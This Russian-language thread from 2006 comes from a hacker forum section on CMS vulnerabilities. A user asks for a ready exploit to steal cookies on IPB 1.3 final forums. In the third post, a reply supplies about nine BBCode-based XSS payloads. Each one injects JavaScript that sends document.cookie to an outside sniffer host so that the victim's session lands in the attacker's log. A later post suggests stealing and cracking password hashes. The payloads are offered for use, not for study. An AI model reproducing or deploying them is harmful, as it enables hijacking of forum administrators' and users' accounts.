Форумы IPB 1.3 final

Discussion in 'Уязвимости CMS/форумов' started by Ragnar, 23 Mar 2006.

Thread Status:
Not open for further replies.
  1. Ragnar

    Ragnar Banned

    Joined:
    20 Mar 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Скажите мне пожалуйста точный текст сплойта для угона кукисов на дырявом форуме ipb 1.3 final , и что б кукисы ловились на снифере античата. Помогите пожалуйста, а то я весь день ищу ничего найти не могу.
     
  2. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Прочти первую (сверху) тему в этом разделе.
    Важно: [Обзор уязвимостей Ipb]
     
  3. GrisS

    GrisS Elder - Старейшина

    Joined:
    7 Jan 2006
    Messages:
    47
    Likes Received:
    1
    Reputations:
    0
    на, в пиши ето всё, и cookie придут в логе ;)

    HTML:
    [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    
    [HTML][EMAIL][URL=wj`=`][/URL][/EMAIL][/color][color=white]` style=`background:url(javascript:document.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/color]
    
    [EMAIL][email protected][URL=target/style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/URL][/EMAIL]
    
    [post=1000[topic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/topic]][/post]
    
    [email][email protected][/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    
    [COLOR=[IÌG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
    
    [åmail][email protected][/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    
    [EMAIL][URL=wj`=`][/URL][/EMAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
    
    [HTML][color=white][EMAIL][URL=wj`=`][/URL][/EMAIL][/color]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
     
    #3 GrisS, 24 Mar 2006
    Last edited: 24 Mar 2006
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Хех интересно а сплойтом не легче сразу хэш взять расшифровать и всё чем ждать пока админ или письмо прочтёт или зайдёт в какую-нибудь из тем.
     
  5. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Ответ получе тему закрываю
     
Thread Status:
Not open for further replies.